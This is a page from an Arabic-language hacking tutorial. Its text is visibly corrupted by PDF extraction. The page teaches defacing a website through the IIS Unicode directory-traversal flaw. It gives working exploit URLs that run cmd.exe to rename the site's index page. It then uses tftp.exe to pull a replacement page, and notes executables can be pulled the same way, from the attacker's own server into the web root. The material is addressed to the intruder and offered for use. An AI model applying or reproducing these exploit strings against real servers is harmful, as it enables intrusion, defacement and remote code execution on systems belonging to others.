Page 141 - بسم الله الرحمن الرحيم

P. 141

‫‪msadc/..%c0%af../..%c0%af../../‬‬
‫‪%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.ht‬‬

‫‪m+ss.htm‬‬

‫وهكذا فقد تصم تصغيير اسم الصفحة من ‪ index.htm‬الى ‪ss.htm‬‬
‫ارأيتم كم هو سهل ‪ (:‬؟‬

‫‪A‬يبدو انك ايها المخترق لم تصكتفي باغلق الصفحة الرئيسيه للموقع فانت تصريد ان تصضع صفحة بموضوع اختر‬
‫وليكن الموضوع هو‬
‫‪!!!Hacked‬‬

‫فكيف سنرسلها في صفحة ‪ index.htm‬؟؟‬
‫هناك عدة طرق ومنها سأذكر هذه الطريقه وهي عبر التصصال بمنفذ ‪ TFTP‬الذي ستكون فيه انت في وضع‬

‫السيرفر والموقع الذي امامك‬
‫في وضع الكلينت‬

‫كيف سيتم هذا ؟‬

‫اول قم بتركيب نظا‪.‬م سيرفر ‪ TFTP‬على جههازك ) البرنامج المذكور في اول الموضوع من افضل البرامج‬
‫وهناك برنامج اختر اكثر احترافا ولكن هذا يكفي (‬
‫الن ضع السيرفر الرئيسي في \‪ C:‬لديك‬

‫قم بتصميم صفحة ختفيفه وسريعه وسمها ‪ index.htm‬وضعها في \‪C:‬‬

‫الن نريد ان نرسل للسيرفر الملف الجديد من \‪ C:‬لدينا الى ملف‬
‫‪C:\inetpub\wwwroot‬‬

‫ل ليس المر صعبا ففي نظم ميكروسوفت يوجهد امر )) هو بالصح برنامجا منفصل (( يحمل اسم ‪TFTP‬‬
‫وهو عباره عن كلينت بسيط يستخد‪.‬م‬

‫بروتصوكول ‪ TFTP‬وهو بروتصوكول بسيط جهدا جهدا )) يسميه البعض البروتصوكول التافه (( يقو‪.‬م بسحب او‬
‫ارسال الملفات من والى الجهاز‬

‫نحن نريد ان يسحب ملفا من جههازنا فكيف لنا ذلك ؟‬
‫طبعا لو كنا في غير اليونيكود لكتبنا تصوليفة المر التالي ‪:‬‬
‫‪tftp.exe -i XXX.XXX.XXX.XXX get index.htm‬‬

‫‪C:\inetpub\wwwroot\index.htm‬‬
‫)) ‪ XXX.XXX.XXX.XXX‬تصعني اي بي السيرفر المراد سحب الملف منه ((‬
‫في تصوليفة هذا المر يقو‪.‬م الكلينت بطلب الملف المسمى ‪ index.htm‬ليضعه في جههازه في المجلد‬

‫‪wwwroot‬‬
‫ولكن ل تصنسى فشكل تصوليفة الوامر يختلف من الوضع العادي عن وضع اليونيكود‬

‫فما هو الحل ؟‬
‫الحل هو ان تصحول تصوليفة المر الى يونيكود لتضعه في الثغره التي لديك‬

‫بعد تصحويل المر الى يونيكود سيصبح شكله كالتالي ‪:‬‬
‫‪tftp.exe+"-‬‬

‫‪i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm‬‬
‫ياللروعه لقد تصجاوزنا العقبه بالفعل ‪(:‬‬

‫الن قم بتشغيل سيرفر الـ ‪ TFTP‬وقم بتجهيز ملف الـ ‪index.htm‬‬
‫وقم بالتصصال مع الموقع عبر ثغرة اليونيكود المضاف اليها هذه التوليفه ليصبح في النهايه على هذا النحو ‪:‬‬

‫‪msadc/..%c1%9c../..%c1%9c../../‬‬
‫‪%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-‬‬
‫‪i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm‬‬

‫وهكذا قمنا بتحميل الصفحة الى النترنت وانتيهنا من عملية الختتراق )) تصقريبا ‪(( (:‬‬
‫ملحوظه ‪ :‬يمكنك ان تصقو‪.‬م بتحميل ملفات ‪ EXE‬ايضا وتصشغيلها على السيرفر بنفس السلوب وهذا مثال ‪:‬‬

‫‪141‬‬

136 137 138 139 140 141 142 143 144 145 146